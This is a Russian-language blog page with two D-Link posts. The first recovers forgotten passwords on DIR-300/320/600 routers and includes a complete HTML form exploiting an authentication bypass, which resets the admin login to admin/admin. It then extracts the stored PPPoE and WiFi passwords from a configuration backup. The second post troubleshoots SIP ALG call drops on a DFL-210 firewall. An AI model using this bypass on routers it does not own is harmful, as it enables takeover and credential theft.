Показаны сообщения с ярлыком DLink. Показать все сообщения
Показаны сообщения с ярлыком DLink. Показать все сообщения

пятница, 15 января 2016 г.

D-Link DIR-300/DIR-320/DIR-600. Восстановление забытого пароля.

Представим себе, что вы попали в ситуацию, когда вам надо зайти в web-интерфейс вашего D-Link DIR-320, а пароль администратора вы не помните. Или возьмем более общую ситуацию, когда вам нужно помочь кому-нибудь настроить новый роутер, вместо старого DIR-320, однако, обратившийся за помощью к вам владелец не помнит абсолютно ничего. Т.е. ни пароля для входа в web-интерфейс, ни пароля для PPPoE соединения, ни пароля для WiFi. Очевидный путь в данной ситуации - это просто отложить DIR-320 в сторону, дозвониться до тех. поддержки провайдера, "сбросить" пароль PPPoE и настроить новый роутер. Однако, есть способ проще, который позволяет достать всю необходимую информацию, непосредственно из имеющегося роутера.

Рассматривать сложные варианты, с созданием PPPoE концентратора на Mikrotik'е для того, чтобы узнать пароль к PPPoE мы не будем. Хотя такой подход тоже имеет место. Вместо этого мы воспользуемся exploit'ом D-Link DIR-300 Multiple Security Bypass Vulnerabilities для получения доступа к нашему роутеру.

Создадим в блокноте файл login.html со следующим содержанием:

<form action="http://192.168.0.1:80/tools_admin.php" method="POST">
<input type="hidden" name="ACTION_POST" value="LOGIN">
<input type="hidden" name="LOGIN_USER" value="a">
<input type="hidden" name="LOGIN_PASSWD" value="b">
<input type="hidden" name="login" value="+Log+In+">
<input type="hidden" name="NO_NEED_AUTH" value="1">
<input type="hidden" name="AUTH_GROUP" value="0">
<input type="hidden" name="admin_name" value="admin">
<input type="hidden" name="admin_password1" value="admin">
<input type="submit">
</form>

И откроем его в браузере. После нажатия кнопки "Отправить", несмотря на появившееся сообщение об ошибке логин и пароль для входа в web-интерфейс будут сброшены на стандартные admin / admin, Так, мы получили доступ к web-интерфейсу. Однако, посмотреть сохраненные в роутере пароли таким образом у нас все равно не получится.

Для того чтобы сделать это, заходим в меню System и выбираем там опцию backup'а настроек устройства на жесткий диск. В результате у нас получается файл config.bin, который как раз и содержит все необходимые нам логины, пароли и явки. Однако, содержимое данного файла в бинарном формате, плюс сжато / зашифровано. Для просмотра содержимого полей логин / пароль в открытом виде нам понадобится утилита RouterPassView v1.62 от Nir Sofer'а. Утилита также поддерживает формат файлов конфигурации от множества других устройств. Открываем полученный config.bin в RoutePassView и видим все необходимое:


Теперь, обладая нужными данными можно приступать к настройке нового роутера. Согласитесь, данный способ куда быстрее, чем связь с ТП провайдера для изменения паролей доступа в интернет. Также, его преимущество в том, что вы также получаете пароль от WiFi и можете настроить беспроводную сеть в новом роутере с теми же учетными данными, чтобы все клиентские устройства, которые уже были настроены на беспроводную сеть старого роутера без каких-либо дополнительных настроек начали соединяться с вновь настроенным роутером.

среда, 14 октября 2015 г.

SIP ALG в DLink DFL-210

Буквально 5-секундная заметка о том как хорошо бывает читать мануалы. В своем недавнем посте я рассказывал об IP-телефоне Huawei eSpace 6830. Недавно встала задача поключить его к SipNet через аппаратный firewall DLink DFL-210. Все вообщем-то настроилось отлично и даже работало, пока в какой-то момент случайно не заметили что телефон рвет сессию ровно на 2:10 секундах разговора. Честно говоря я перекрутил все что можно ... настройки Session Timeout в самом eSpace - Срок сессии, Min-SE, Безусловный INVITE и т.п. Но все безрезультатно.

Тогда я решил обратиться к мануалу по DFL-210, а именно Как настроить SIP-ALG на межсетевых экранах серии DFL-210/260/ 260E/800/860/ 860E/1600/ 1660/2500/2560, где нашел вот такой вот совет:

Т.е. помимо настройки правил для SIP (sip-udp) необходимо было еще установить флажок UDP Bidirectional keep-alive.

Для начала покажу настройки самого IP телефона, а также выдержку из мануала по нему:



Корни проблемы, как видно, оказались скрыты в UDP Idle Lifetime, 2:10 - это ровно 130 секунд. Однако решить ее с помощью UDP Bidirectional keep-alive мне не удалось.

Описание данного параметра:

This allows both sides to keep a UDP connection alive. The default is for NetDefendOS to mark a connection as alive (not idle) every time data is sent from the side that opened the connection. Connections that do not receive any data from the opening side within the UDP lifetime will therefore be closed even if the other side continues to transmit data.

Почитав форум DLink'а я понял, что абсолютно все пользователи DFL-210 пишут что SIP-ALG на нем корректно не работает и предлагают другие варианты решения проблемы, которые так или иначе связаны с отказом от использования SIP-ALG. Либо же просто опускают руки (см. эту ветку):

"В этом-то и проблема. Когда я настраивал правила вида "вообще все с SIPNET тупо кидаем на внутренний адрес VoIP" - также часами работало но сейчас я планирую ставить несколько ВоИП телефонов в локалке, плюс использовать несколько разных SIP-провайдеров, и вот тут уже обычными правилами - замахаешься все настраивать. а SIP ALG - отлично работает, два правила, и далее гоняй телефонами что угодно и как угодно. Только вот рвется ровно через 120 секунд. пробовал в настройках SIP ALG менять timeout (он там один) с 120 сек на 1200 сек - пофиг, рвется через 2 минуты".

Я же перечитав кучу мануалов по SIP и потратив целую ночь на попытки настроить SIP-ALG на корректную работу, наткнулся на World-Wide сайт DLink'а - http://tsd.dlink.com.tw/ , где были выложены более свежие версии прошивок на DFL-210, в частности DFL-210_FW_v2.27.08.03-upgrade.img и DFL-210_FW_v2.27.08.04-Russian-upgrade.img . В notes'ах к ним было указано:

  • Certain SIP PBX configurations caused the firewall to drop INVITE requests.
  • The SIP ALG did not use the "420 Bad Extension" response in certain circumstances.
  • In rare occasions, closing down a SIP session could lead to an unexpected restart.
  • Some network scenarios caused the SIP ALG to close SIP calls two minutes after the call was established
  • In certain scenarios, the voice transmitted through the SIP ALG terminated suddenly two minutes after the call was established.
И т.д., конечно же нас интересовали последние два пункта. Но, к сожалению, ни обновление прошвики, ни советы типа этого: "На прошивке 2.26 попробуйте включить System -> Advanced Settings -> IP Settings -> SecuRemoteUDP Compatibility System -> Advanced Settings -> Conn. Timeout Settings -> UDP Bidirectional keep-alive, сохраните и активируйте настройки, после этого Полностью перезагрузите устройство." не помогли избавиться от проблемы "двухминутного звонка".

Из чего можно сделать единственный неутешительный вывод ... SIP-ALG в DFL-210 работает криво и по сей день.